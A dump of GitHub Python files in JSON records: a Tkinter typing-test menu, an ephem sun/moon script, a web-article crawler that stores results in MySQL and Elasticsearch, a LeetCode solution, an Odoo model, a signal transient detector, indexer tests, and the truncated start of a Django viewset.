self._handle_logout_view = handle_logout_view\n self._handle_new_typing_test_view = handle_new_typing_test_view\n self._handle_user_statistics_view = handle_user_statistics_view\n\n self._frame = None\n\n self._initialize()\n\n def pack(self):\n self._frame.pack(fill = constants.X)\n\n def destroy(self):\n self._frame.destroy()\n\n def _initialize(self):\n\n self._root.geometry(\"300x200\")\n self._frame = ttk.Frame(master = self._root)\n self._frame.grid_rowconfigure(0, weight=1)\n self._frame.grid_columnconfigure(0, weight=1)\n \n self._initialize_header()\n self._initialize_start_typing_test_button()\n self._initialize_statistics_button()\n self._initialize_logout_button()\n\n def _initialize_header(self):\n\n username = user_service.get_current_user().username\n\n header = ttk.Label(master = self._frame,\n text = f\"Logged in as {username}\",\n font = ('consolas', 13, 'bold'))\n\n header.grid(column=0, row=0, padx = 5, pady = 5)\n\n def _initialize_start_typing_test_button(self):\n\n typing_test_button = ttk.Button(master = self._frame,\n text = \"Start a typing test\",\n command = self._handle_new_typing_test_view,\n width = 200)\n\n typing_test_button.grid(column = 0, row = 1, padx = 5, pady = 5)\n\n def _initialize_statistics_button(self):\n\n statistics_button = ttk.Button(master = self._frame,\n text = \"Statistics\",\n command = self._handle_user_statistics_view,\n width = 200)\n\n statistics_button.grid(column = 0, row = 2, padx = 5, pady = 5)\n\n def _initialize_logout_button(self):\n\n logout_button = ttk.Button(master = self._frame,\n text = \"Logout\",\n command = self._handle_logout,\n width = 200)\n\n logout_button.grid(column = 0, row = 3, padx = 5, pady = 5)\n\n def _handle_logout(self):\n\n user_service.logout()\n self._handle_logout_view()","repo_name":"schmaigul/ot-harjoitustyo","sub_path":"TypingTest/src/ui/menu_view.py","file_name":"menu_view.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37264873457","text":"from datetime import datetime,timedelta\nimport pysolar.solar as ps\nimport ephem\n\ngatech = ephem.Observer(); gatech.lat, gatech.lon = '40.88', '-72.87'\nsun,moon=ephem.Sun(), ephem.Moon()\nsun.compute(gatech)\nmoon.compute(gatech)\nprint(ps.get_altitude(40.88,-72.87,datetime.now()))\nprint(\"%s %s\" % (sun.alt, sun.az))\nprint(\"%s %s\" % (moon.alt, moon.az))","repo_name":"BNL-NowCasting/SolarForecasting","sub_path":"code/stereo/test_ephem.py","file_name":"test_ephem.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"3421119883","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time :2019/6/17 9:58\n# @Author :zhai shuai\n\"\"\"\n 作用\n 一: 辅助工具类,\n 二: 功能函数都是写在这个文本里面\n 难点\n 注意点\n\"\"\"\nimport configparser, os, requests, json,re,time,logging,datetime,shutil\nfrom bs4 import BeautifulSoup\nfrom elasticsearch import helpers\nimport uuid\n\ndef unsubscribeArticles(readerPanelListSorted,sess,websiteurl) :\n \"\"\"\n 取消文章的订阅\n :param readerPanelListSorted: 传入的list,格式是 [{id:文章的url},{id:文章的url},.....]\n :return:\n \"\"\"\n articleIds = []\n for temp in readerPanelListSorted :\n articleIds.append(temp[\"id\"])\n articleIds = \"[\\\"\" + \"\\\",\\\"\".join(articleIds) + \"\\\"]\"\n mydata = {\n 'xjxfun': 'read_article',\n 'xjxargs[]': articleIds\n }\n\n requests.post(websiteurl, data=mydata,cookies=sess.cookies)\n\n\"\"\"\n ###################CrawlArticle####存的下需要的函数###############################################\n\"\"\"\ndef readConfig(config, section):\n \"\"\"\n 读取配置文件的信息\n :param config: 哪个配置文件\n :param section: 配置文件的section\n :return:\n \"\"\"\n configDir = \"/config/\"\n \"\"\"\n :param section: 想要获取哪个文件的配置信息\n :param section: 想要获取某个配置文件的哪部分的配置信息,如果mysql,es等配置信息\n :return: 返回该配置的字典\n \"\"\"\n root_dir = os.path.dirname(os.path.abspath('.')) # 获取当前文件所在目录的上一级目录\n cf = configparser.ConfigParser()\n cf.read(root_dir + configDir + config) # 拼接得到requestHeader.ini文件的路径,直接使用\n if section != False:\n options = cf.items(section) # 获取某个section名为Mysql-Database所对应的键\n return dict(options) # 转成dict\n else:\n return cf\n\ndef getBuiltTreeJsonData(sess,username,password,websiteurl):\n cf = readConfig(\"requestHeader.ini\", False)\n headerJson = {\n \"referer\":str(websiteurl)+\"/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\"\n }\n\n loginUrl = str(websiteurl)+\"/login\"\n\n warp_action = cf.get(\"login-user-info\", \"warp_action\")\n remember_me = cf.get(\"login-user-info\", \"remember_me\")\n params = {\n \"username\": username,\n \"password\": password,\n \"warp_action\": warp_action,\n \"remember_me\": remember_me\n }\n # 创建向登录页面发送POST请求的Request\n sess.post(loginUrl, data=params, headers=headerJson)\n\n mydata = {\n 'xjxfun': 'build_tree'\n }\n\n myresponse = requests.post(websiteurl, data=mydata, cookies=sess.cookies)\n return myresponse\n\n\ndef createArticleStoreLocalDir(articleStoreDir):\n \"\"\"\n 得到存储文章的本地目录\n \"\"\"\n cf = readConfig(\"requestHeader.ini\", False)\n articleStoreLocalDir = mainUrl = cf.get(\"article-storelocaldir\", \"articlestorelocaldir\")\n\n localDir = articleStoreLocalDir+articleStoreDir+\"/\"\n if not os.path.exists(localDir):\n os.makedirs(localDir)\n return localDir\n\ndef analyseTreeBuiltJsonData(builtTreeJson):\n \"\"\"\n 解析出订阅信息,\n (1)如果没有订阅,则json.loads(jsonStr.content).get('xjxobj')[1]['data'] 的返回值是:\n (2)如果有订阅,则返回的数据要远大于这些��符串\n :param jsonStr: 浏览器返回的信息\n :return:\n \"\"\"\n channelInfo = json.loads(builtTreeJson.content).get('xjxobj')[1]['data']\n return True if len(channelInfo) > 20 else False\n\n\n\ndef getPrintArticlesJsonData(sess,websiteurl):\n \"\"\"\n 返回 未读文章信息(订阅频道的未读文章)\n 注意:返回的对象实际上是json信息,里面含有未读文章信息\n \"\"\"\n cf = readConfig(\"requestHeader.ini\", False)\n mydata = {\n 'xjxfun': 'print_articles'\n }\n myresponse = requests.post(websiteurl, data=mydata, cookies=sess.cookies)\n return myresponse\n\ndef analyseReaderPanel(printArticlesHtml,websiteurl) :\n \"\"\"\n 得到文章的url信息和文章的id,把它组成一个list,组成一个[{id:文章的url},{id:文章的url},.....]的形式\n :return:\n \"\"\"\n articleUrlPrefix = str(websiteurl)+\"/article/\"\n soup = BeautifulSoup(printArticlesHtml, 'lxml')\n readerPanels = soup.select('div[data-oid]')\n\n listTotal = []\n for temp in readerPanels :\n singleMap = {\"id\":temp['data-aid'],\"url\":articleUrlPrefix+temp['data-oid']}\n listTotal.append(singleMap)\n return listTotal\n\n\ndef analyseArticlesLoaded(articlesLoadedHtml,username) :\n \"\"\"\n 用于解析文章,它的解析\n 得到文章的url信息和文章的id, 把它组成一个list, 组成一个[{\"id\":id的值,\"htmltext\":\"文章html的内容\"}, {\"id\":id的值,\"htmltext\":\"文章html的内容\"},.....]\n :param articlesLoadedHtml:\n :return:\n \"\"\"\n listTotal = []\n articleContent = articlesLoadedHtml[0]\n for temp in articleContent.items():\n id = temp[0]\n htmltext = temp[1]\n soup = BeautifulSoup(htmltext, 'lxml')\n articleUrl = soup.find(\"div\", attrs={\"class\": \"header_buttons\"}).find(\"a\")[\"href\"]\n articleTitle = soup.select(\".article_title_link\")[0].text.strip()\n articlePublicDate = analyseSingleArticlePublicDate(soup)\n articleAuthor = analyseSingleArticleAuthor(soup)\n articleChannel = analyseSingleArticleChannel(soup)\n articleId = str(uuid.uuid1())\n singleMap = {\n \"articleUrl\":articleUrl,\n \"articleTitle\":articleTitle,\n \"articlePublicDate\":articlePublicDate,\n \"articleAuthor\":articleAuthor,\n \"articleId\":articleId,\n \"username\":username,\n \"articlechannel\":articleChannel,\n \"id\":id\n }\n listTotal.append(singleMap)\n return listTotal\n\n\ndef storeFileToLocal(articlesLoadedListSorted,articleStoreLocalDir):\n # 把每篇文章写入本地目录文件\n for temp in articlesLoadedListSorted:\n if \"articleContent\" in temp: #判断本篇文章是否取到了内容,如果没有取得内容,就不存入本地目录\n articleContent = temp['articleContent']\n articleId = temp['articleId']\n f = open(articleStoreLocalDir + articleId + \".html\", \"w\", encoding=\"utf-8\")\n f.write(str(articleContent))\n f.close()\n\n\ndef storeFileToMysqlVerifyDuplicate(articles24LoadedListSorted,articleStoreLocalDir,mysqlConn):\n \"\"\"\n 把数据插入到mysql数据库中,这个是方法验证了数据的重复性\n \"\"\"\n cur = mysqlConn.cursor();\n insertSql = \"insert into webcrawlerfilelist(id,articleurl,articledir,articletitle,articleauthor,publicdate,iscrawler,username,articlechannel)\" \\\n \" values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n querySql = \"select count(id) from webcrawlerfilelist where articleurl=(%s)\"\n for temp in articles24LoadedListSorted:\n articleLocalDir = articleStoreLocalDir + temp['articleId'] + \".html\" if \"articleContent\" in temp else \"\"\n cur.execute(querySql,(temp['articleUrl']))\n queryResultRowNum =cur.fetchone()[0]\n if not queryResultRowNum:\n cur.execute(\n insertSql,\n (temp['articleId'],temp['articleUrl'],articleLocalDir,temp['articleTitle'],\n temp['articleAuthor'],temp['articlePublicDate'],temp['isCrawler'],temp['username'],temp['articlechannel'])\n )\n # 进行提交,批量插入数据,没有提交的话,无法完成插入\n mysqlConn.commit()\n\ndef analyseNewArticles(sess,websiteurl,username,mysqlConn):\n \"\"\"\n 查看是否有新的文章,如果有新文章就返回[{\"id\":id的值,\"htmltext\":\"文章html的内容\"}],如果没有新的文章就返回False\n :param printArticleJson:\n :return:\n \"\"\"\n printArticleInfo = getPrintArticlesJsonData(sess,websiteurl) #得到全部PrintArticles信息\n printArticleInfo = json.loads(printArticleInfo.content).get('xjxobj')\n\n articlesLoadedHtml = '' #得到{cmd: \"jc\", func: \"articles_loaded\",…} 这一项的信息\n\n for tempNum in range(len(printArticleInfo)) :\n if articlesLoadedHtml != '':\n break\n if 'func' in printArticleInfo[tempNum] :\n if 'check_older_articles_hint' == printArticleInfo[tempNum]['func'] : #如果有这个方法名,则表明所有的频道下面没有最新的文章\n return False\n if 'articles_loaded' == printArticleInfo[tempNum]['func'] :\n articlesLoadedHtml = printArticleInfo[tempNum]['data']\n articlesLoadedList = analyseArticlesLoaded(articlesLoadedHtml,username)\n articlesLoadedList = getArticleContent(articlesLoadedList,mysqlConn);\n return articlesLoadedList\n\n\"\"\"\n ###################AnalyseArticle####存的下需要的函数###############################################\n\"\"\"\n\ndef analyseSingleArticlePublicDate(soupObj) :\n \"\"\"\n 解析文章发表时间 日期有两种格式,\n 一个是 %a %b %d, %Y %H:%M 接收日期: Thu Jun 13, 2019 16:32 发布日期: Sun Jun 02, 2019 16:12\n 一个是:%H:%M 接收日期: 09:17 发布日期: 09:09\n :param soupObj:\n :return:\n \"\"\"\n articleTime = soupObj.find(\"div\", attrs={\"class\": \"header_date\"}).attrs['title']\n searchObj = articleTime.split(\": \")\n publicDate = searchObj[2]\n if (re.search(r'^\\d{2}:\\d{2}', publicDate)):\n strTime = time.strftime(\"%Y-%m-%d \") + publicDate\n else:\n timeStruct = time.strptime(publicDate, \"%a %b %d, %Y %H:%M\")\n strTime = time.strftime(\"%Y-%m-%d %H:%M\", timeStruct)\n\n return strTime\n\ndef queryAnalyseData(mysqlConn):\n # 使用cursor()方法获取操作游标\n cursor = mysqlConn.cursor()\n\n # SQL 查询语句\n sql = \"select id,articleurl,articledir,updatedate,articletitle,articleauthor,publicdate,iscrawler from webcrawlerfilelist where articleflag=-3\"\n usersvalues = []\n try:\n # 执行SQL语句\n cursor.execute(sql)\n # 获取所有记录列表\n results = cursor.fetchall()\n #把results这些数据的articleflag=-2表明它正在处理\n for temp in range(0, len(results)):\n usersvalues.append((-2, results[temp][0]))\n cursor.executemany('update webcrawlerfilelist set articleflag =%s where id =%s',usersvalues)\n mysqlConn.commit() # 没有提交的话,无法完成插入\n except:\n print (\"Error: unable to fecth data\")\n return results\n\ndef analyseSingleArticleAuthor(soup):\n textauthor = soup.find(\"span\", attrs={\"class\": \"article_author\"}).text\n textauthor = textauthor.replace(\" \", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n\n author = re.findall(r\"(.*)由(.*)新增规则\", textauthor)\n if len(author) ==0:\n author = re.findall(r\"(.*)by(.*)Createrule\", textauthor)\n if author:\n author = author[0][1]\n else:\n author = \"\"\n return author\n\ndef analyseArticleDate(fetchAll):\n \"\"\"\n 分析文章\n :param fetchAll:\n :return:\n \"\"\"\n dataList = [];\n insertTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n for row in fetchAll:\n articleurl = row[1]\n articledir = row[2]\n articletitle = row[4]\n articleauthor = row[5]\n publicdate = str(row[6])\n iscrawler = row[7]\n finalEsContent = analyseSingleArticle(articledir,iscrawler)\n if iscrawler == 1:\n singleMap = {\"title\": articletitle, \"author\": articleauthor,\n \"url\": articleurl, \"articledir\": articledir,\n \"publicDate\": publicdate, \"insertDate\": insertTime,\n \"analyseFlag\": \"false\", \"content\": finalEsContent,\"iscrawler\":iscrawler}\n dataList.append(singleMap)\n return dataList\n\n\ndef analyseSingleArticle(articledir,iscrawler):\n \"\"\"\n 分析一篇文章的内容,这里只分析文章的内容\n :param articledir: 传入该篇文章的本地存储目录,爬虫标识\n :return:\n \"\"\"\n finalEsContent = \"\"\n if iscrawler == 1:\n f = open(articledir, \"r\", encoding=\"utf-8\")\n articleContent = f.read()\n soup = BeautifulSoup(articleContent,\"html5lib\")\n [s.extract() for s in soup([\"script\", \"style\", \"svg\"])] # 去除这些指定的标签,因为对于文章内容来说这些是没有用的\n finalEsContent += \"\".join([s for s in soup.get_text().splitlines(True) if s.strip()])\n f.close()\n return finalEsContent\n\ndef importDataToEs(esConn,articleListData,fetchAll,mysqlConn,es_index,es_type):\n actions = [\n {\n \"_index\": es_index,\n \"_type\": es_type,\n '_source': d\n }\n for d in articleListData\n ]\n\n # 批量插入\n try:\n helpers.bulk(esConn, actions)\n except Exception as e:\n print(e.args)\n\n # 把results这些数据的articleflag=-1表明它正在处理\n usersvalues = []\n for temp in range(0, len(fetchAll)):\n usersvalues.append((-1, fetchAll[temp][0]))\n mysqlConn.cursor().executemany('update webcrawlerfilelist set articleflag =%s where id =%s', usersvalues)\n mysqlConn.commit() # 没有提交的话,无法完成插入\n\n\ndef createLog():\n cf = readConfig(\"requestHeader.ini\", False)\n log_path = cf.get(\"logger\", \"loggerDir\")\n # 第一步,创建一个logger\n logger = logging.getLogger()\n logger.setLevel(logging.INFO) # Log等级总开关\n # 第二步,创建一个handler,用于写入日志文件\n rq = time.strftime('%Y%m', time.localtime(time.time()))\n log_name = log_path + rq + '.log'\n logfile = log_name\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n fh = logging.FileHandler(logfile, mode='a', encoding=\"utf-8\")\n fh.setLevel(logging.DEBUG) # 输出到file的log等级的开关\n # 第三步,定义handler的输出格式\n formatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\n fh.setFormatter(formatter)\n # 第四步,将logger添加到handler里面\n logger.addHandler(fh)\n return logger\n\n\ndef queryUsers(mysqlConn):\n \"\"\"\n 获取所有的用户\n :param mysqlConn: mysql连接\n :return:\n \"\"\"\n cur = mysqlConn.cursor();\n querySql = \"select username,password,websiteurl,websitename from webcrawlerusers\"\n cur.execute(querySql)\n results = cur.fetchall()\n return results\n\ndef deleteMysqlArticle(mysqlConn):\n \"\"\"\n 每天删除mysql三天前已经成功的数据\n :param mysqlConn:\n :return:\n \"\"\"\n cur = mysqlConn.cursor();\n beforeThreeDay = datetime.date.today() + datetime.timedelta(-6)\n sql = 'delete from webcrawlerfilelist where updatedate < STR_TO_DATE(%s,%s) and articleflag = %s'\n cur.execute(sql,[beforeThreeDay,'%Y-%m-%d',-1])\n mysqlConn.commit()\n\ndef deleteLocalDirArticle():\n \"\"\"\n 每天删除本地存储文件当中三天前数据\n :return:\n \"\"\"\n beforeThreeDay = datetime.date.today() + datetime.timedelta(-7)\n cf = readConfig(\"requestHeader.ini\", False)\n localFileDir = cf.get(\"article-storelocaldir\", \"articlestorelocaldir\")\n removeDir = localFileDir+str(beforeThreeDay)\n if os.path.exists(removeDir):\n shutil.rmtree(removeDir)\n\ndef getArticleContent(articlesLoadedList,mysqlConn):\n \"\"\"\n 该方法是取得每篇文章的文章内容\n :param articlesLoadedList: 这个是一个列表list\n :return:\n \"\"\"\n\n #开启文章的过滤,如果是特定频道(不能抓取的频道,就不让它尝试抓取了)\n #excludeChannel = getExcludeChannel(mysqlConn)\n\n #开启文章的过滤\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36 LBBROWSER'\n }\n for temp in articlesLoadedList:\n articleUrl = temp[\"articleUrl\"]\n try:\n response = requests.get(articleUrl,timeout=80,headers=headers)\n if response.status_code == 200:\n temp[\"isCrawler\"] = 1\n temp[\"articleContent\"] = response.content.decode(\"utf-8\")\n else:\n temp[\"isCrawler\"] = 2\n except Exception:\n temp[\"isCrawler\"] = 3\n\n return articlesLoadedList\n\ndef analyseSingleArticleChannel(soup):\n \"\"\"\n 分析一篇文章的频道\n :param soup:\n :return:\n \"\"\"\n channel = \"\"\n tag = soup.find(\"a\", attrs={\"class\": \"boldlink boldlink ajaxed\"})\n if tag:\n channel = tag.text\n return channel\n\ndef retryCrawler(mysqlConn,articleStoreLocalDir):\n \"\"\"\n 对于初次不能爬取的文章,我们再去尝试去爬取\n :param mysqlConn:\n :param articleStoreLocalDir:\n :return:\n \"\"\"\n querySql = \"select id,articleurl,iscrawler,articlechannel from webcrawlerfilelist where iscrawler in (2,3) and articleflag=-3\"\n cur = mysqlConn.cursor()\n cur.execute(querySql)\n results = cur.fetchall()\n\n retryList = tupleToList(results)#tuple转成list\n retryList = getArticleContent(retryList,mysqlConn)#再次去请求网络\n retryUpdateArticleContent(mysqlConn,retryList,articleStoreLocalDir)#更新本地文件和数据库\n\n\ndef tupleToList(result):\n \"\"\"\n 把tuple 转换成list\n :param result:\n :return:\n \"\"\"\n list = []\n for temp in result:\n single = {\n \"id\":temp[0],\n \"articleUrl\":temp[1],\n \"isCrawler\":temp[2],\n \"articlechannel\":temp[3]\n }\n list.append(single)\n return list\n\ndef retryUpdateArticleContent(mysqlConn,retryList,articleStoreLocalDir):\n \"\"\"\n 更新再次请求的数据\n :param retryList:\n :return:\n \"\"\"\n cur = mysqlConn.cursor()\n updateSql = \"update webcrawlerfilelist set articledir=%s,iscrawler=%s where id=%s\"\n for temp in retryList:\n if \"articleContent\" in temp:\n #把文章内容写入文件\n localdir = articleStoreLocalDir + temp[\"id\"] + \".html\"\n f = open(localdir, \"w\", encoding=\"utf-8\")\n f.write(str(temp['articleContent']))\n f.close()\n #更新数据库\n cur.execute(updateSql,(localdir, temp['isCrawler'], temp['id']))\n mysqlConn.commit()\n\n\ndef getExcludeChannel(mysqlConn):\n \"\"\"\n 查询常见的不能抓取的频道名称\n :param mysqlConn:\n :return:\n \"\"\"\n sql = \"select channelname from excludechannel\"\n # 执行SQL语句\n cursor = mysqlConn.cursor()\n cursor.execute(sql)\n # 获取所有记录列表\n results = cursor.fetchall()\n #把元组转成list\n resultList = []\n for temp in results:\n resultList.append(temp[0])\n return resultList;\n\ndef createEsIndex(esConn,es_index,es_type):\n \"\"\"\n 创建es索引\n :param esConn:\n :param es_index:\n :param es_type:\n :return:\n \"\"\"\n\n if not esConn.indices.exists(index=es_index):\n CREATE_BODY = {\n \"settings\": {\n \"number_of_shards\": 5,\n \"number_of_replicas\": 1\n },\n \"mappings\": {\n es_type: {\n \"properties\": {\n \"analyseFlag\": {\n \"type\": \"keyword\"\n },\n \"articledir\": {\n \"type\": \"keyword\"\n },\n \"author\": {\n \"type\": \"text\",\n \"analyzer\": \"ik_max_word\",\n \"fields\": {\n \"keyword\": {\n \"type\": \"keyword\",\n \"ignore_above\": 256\n }\n }\n },\n \"content\": {\n \"type\": \"text\",\n \"analyzer\": \"ik_max_word\"\n },\n \"insertDate\": {\n \"type\": \"keyword\"\n },\n \"iscrawler\": {\n \"type\": \"long\"\n },\n \"publicDate\": {\n \"type\": \"keyword\"\n },\n \"title\": {\n \"type\": \"text\",\n \"analyzer\": \"ik_max_word\",\n \"fields\": {\n \"keyword\": {\n \"type\": \"keyword\",\n \"ignore_above\": 500\n }\n }\n },\n \"url\": {\n \"type\": \"text\",\n \"fields\": {\n \"keyword\": {\n \"type\": \"keyword\",\n \"ignore_above\": 500\n }\n }\n }\n }\n }\n }\n }\n esConn.indices.create(index=es_index, body=CREATE_BODY)\n\ndef addChannelData(mysqlConn):\n \"\"\"\n 向频道表中插入数据\n :param mysqlConn: mysql连接\n :return:\n \"\"\"\n reg = \"(http|https)://[^\\s]*?/\" #提取到三级域\n cursor = mysqlConn.cursor()\n # 存放当天的数据\n currdayList = []\n # 数据库中所有的数据\n databaseList = []\n # 新增数据\n insertData = []\n # 从当天的数据当中筛选url,只查找能拉取下来的数据\n articleStoreDir = time.strftime('%Y-%m-%d', time.localtime(time.time()));\n queryStr = \"select articleurl from webcrawlerfilelist where DATE_FORMAT(updatedate,'%Y-%m-%d')='\" + articleStoreDir + \"' and iscrawler=1\"\n insertSql = \"insert into channellist(channelurl) values(%s)\"\n cursor.execute(queryStr)\n currdayresults = cursor.fetchall()\n if currdayresults:\n for temp in currdayresults:\n url = re.match(reg, temp[0]).group()\n currdayList.append(url)\n currdayList = list(set(currdayList)) # 对list数据进行去重\n # 从channellist表当中查询出所有的数据\n queryStr = \"select channelurl from channellist\"\n cursor.execute(queryStr)\n databaseresults = cursor.fetchall()\n if databaseresults:\n for temp in databaseresults:\n databaseList.append(temp[0])\n\n # 插入数据\n if currdayList:\n for temp in currdayList:\n if temp not in databaseList:\n cursor.execute(insertSql, (temp))\n mysqlConn.commit()","repo_name":"kbbingbai/WebCrawler","sub_path":"com/hxht/service/funs.py","file_name":"funs.py","file_ext":"py","file_size_in_byte":22984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"118927167","text":"# Algo. 1\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n \"\"\"\n : Input digits: str\n : Output: List[str]\n :\n : TC: 92.41%, worst case O(4^n), normally O(3^n), \n : SC: 5.88%, worst case O(4^n+4^(n-1)+4^(n-2)+...+4^1), stack for recursive? lst_prev for each recursive step.\n :\\Algo. 1 from Ligang using recursion. For this kinda of problem where the result is dependent on the previous/last \n : step, recursion is a natural choice. Use HashTable (Dictionary) to store the digit2letter mapping info.\n : Any better algo.?\n \"\"\"\n dict_dgt2ltr = {\"2\":[\"a\", \"b\", \"c\"], \"3\":[\"d\", \"e\", \"f\"], \"4\":[\"g\", \"h\", \"i\"], \"5\":[\"j\", \"k\", \"l\"] \n , \"6\":[\"m\", \"n\", \"o\"], \"7\":[\"p\", \"q\", \"r\", \"s\"], \"8\":[\"t\", \"u\", \"v\"], \"9\":[\"w\", \"x\", \"y\", \"z\"]}\n n = len(digits)\n if n == 0: return []\n if n == 1: return dict_dgt2ltr[digits[0]]\n \n \n def recursive_func(digits: str) -> List[str]: \n n = len(digits)\n if n == 0: return []\n if n == 1: return dict_dgt2ltr[digits[0]]\n \n lst_prev = recursive_func(digits[0:n-1])\n lst_curr = []\n for i in range(len(lst_prev)):\n for j in range(len(dict_dgt2ltr[digits[n-1]])):\n lst_curr.append(lst_prev[i] + dict_dgt2ltr[digits[n-1]][j])\n \n return lst_curr\n \n \n return recursive_func(digits)\n\n\n\n\n","repo_name":"loganchen39/Leetcode_2019","sub_path":"src/Medium/0017.M.LetterCombinationsOfAPhoneNumber.py","file_name":"0017.M.LetterCombinationsOfAPhoneNumber.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72150411784","text":"from odoo import api, fields, models, _\n\n\nclass PosPaymentMethod(models.Model):\n _inherit = \"pos.payment.method\"\n\n needs_authorization_code = fields.Boolean(\n string='# Transacción requerida')\n use_payment_terms = fields.Boolean(string='Usar plazo de pago')\n payment_term_ids = fields.Many2many(\n 'account.payment.term', string='Plazo de pago')\n","repo_name":"marcobustamanteab/odoo-pos","sub_path":"src/custom-addons/dv_pos_payment_terms_auth/models/pos_payment_method.py","file_name":"pos_payment_method.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19852877369","text":"from __future__ import division\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# This file is part of DELTADOGS package.\n# DELTADOGS is free software for global optimization of computationally expensive function evaluaitons\n# you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# DELTADOGS is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with DELTADOGS. If not, see .\n\n# Author: Shahrouz Alimohammadi\n# Modified: Dec. 2016\n\n\n# KSE simulation using IMEXRKi4CBA(3s)\ndata1FilePath = \"data1.txt\"\n\ndef transient_detector(x=[]):\n# transient_time_detector(x) is an automatic procedure to determine the nonstationary part a signal from the stationary part.\n# It finds the transient time of the simulation using the minimum variance intreval.\n# INPUT:\n# x: is the signal which after some transient part the signal becomes stationary\n# OUTPUT:\n# ind: is the index of signal that after that the signal could be considered as a stationry signal.\n\n# If you use this code please cite:\n# Beyhaghi, P., Alimohammadi, S., and Bewley, T., A multiscale, asymptotically unbiased approach to uncertainty quantification \n# in the numerical approximation of infinite time-averaged statistics. Submitted to Journal of Uncertainity Quantification. \n\n N = len(x)\n k = np.int_([N/2])\n y = np.zeros((k, 1))\n for kk in np.arange(k):\n y[kk] = np.var(x[kk+1:])*1.0/(N-kk-1.0)\n y = np.array(-y)\n ind = y.argmax(0)\n print('index of transient point in the signal:')\n print(ind)\n return ind\n\n\n\n\ndef readInputFile(filePath):\n# reads a time series data from a file\n\n# retVal = []\n# with open(filePath, 'rb') as csvfile:\n# filereader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n# for row in filereader:\n# retVal.append([int(row[0]), int(row[1]), int(row[2])])\n retVal=[]\n with open(filePath) as file:\n line=file.readline()\n arr=[float(a) for a in line.split(',')]\n # retVal.append(file.readline())\n retVal.append(arr)\n return retVal[0]\n\n# TEST\nx = readInputFile(data1FilePath)\nx = x[:10000]\nindex = transient_detector(x)\n\n\n\n## sampled time intervals 1\nt = np.arange(0., len(x))\n# red dashes transient detector, green curve simulation results of KSE\nplt.plot(t, x, '-g')\nplt.plot([index,index], [np.min(x)/2.0, np.max(x)], '--r')\nplt.show()\n\n","repo_name":"salimoha/DOGS","sub_path":"UQ/transient_detection.py","file_name":"transient_detection.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"10282723463","text":"\"\"\" Test cases for the module responsible for transforming the data from \nthe database to a parquet file\"\"\"\n\nfrom biosearch_core.indexing.exporter import IndexManager\nfrom biosearch_core.db.model import ConnectionParams\n\ndef test_indexer_identifies_all_nodes_in_modalities():\n \"\"\" Leaf modalities must be joined with parents\n For example, mic.ele should output mic.ele and mic to enable filtering at\n multiple levels\n \"\"\"\n\n fake_conn = ConnectionParams(None, 1, None, None, None, \"schema\")\n index_mgr = IndexManager(None, fake_conn)\n modalities = [\"mic.flu\", \"mic.ele.sca\", \"gra.his\", \"oth\"]\n # pylint: disable=W0212:protected-access\n output = index_mgr._add_modality_parents(modalities)\n assert \"mic\" in output\n assert \"mic.flu\" in output\n assert \"mic.ele.sca\" in output\n assert \"gra\" in output\n assert \"gra.his\" in output\n assert \"oth\" in output\n\ndef test_indexer_returns_non_for_missing_modalities():\n \"\"\" Base case when there are no modalities \"\"\"\n fake_conn = ConnectionParams(None, 1, None, None, None, \"schema\")\n index_mgr = IndexManager(None, fake_conn)\n # pylint: disable=W0212:protected-access\n output = index_mgr._add_modality_parents([])\n assert output is None\n output = index_mgr._add_modality_parents(None)\n assert output is None\n","repo_name":"uic-evl/bio-search","sub_path":"content-onboarding/tests/test_indexing.py","file_name":"test_indexing.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27175858990","text":"import calendar\nimport json\nfrom calendar import monthrange\nimport datetime\nfrom datetime import timedelta\nimport itertools\nfrom django.shortcuts import render\nfrom rest_framework import viewsets\nfrom django.db.models import Q\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom .models import (\n Rent,\n)\nfrom .serializers import (\n RentListSearializer,\n RentDetailSearializer,\n RentFilterSerializer,\n RentByLocationSerializer,\n)\nfrom .filters import (\n RentFilter,\n)\n\n# Create your views here.\n\nclass RentViewSet(viewsets.ReadOnlyModelViewSet):\n #filter by age between 25 - 70 driver requirements minimum driver age\n\n filter_backends = (DjangoFilterBackend,)\n filter_class = RentFilter\n\n def get_serializer_class(self):\n if self.action == 'list':\n return RentListSearializer\n return RentDetailSearializer\n\n \n\n def get_queryset(self):\n queryset = Rent.objects \\\n .select_related(\n 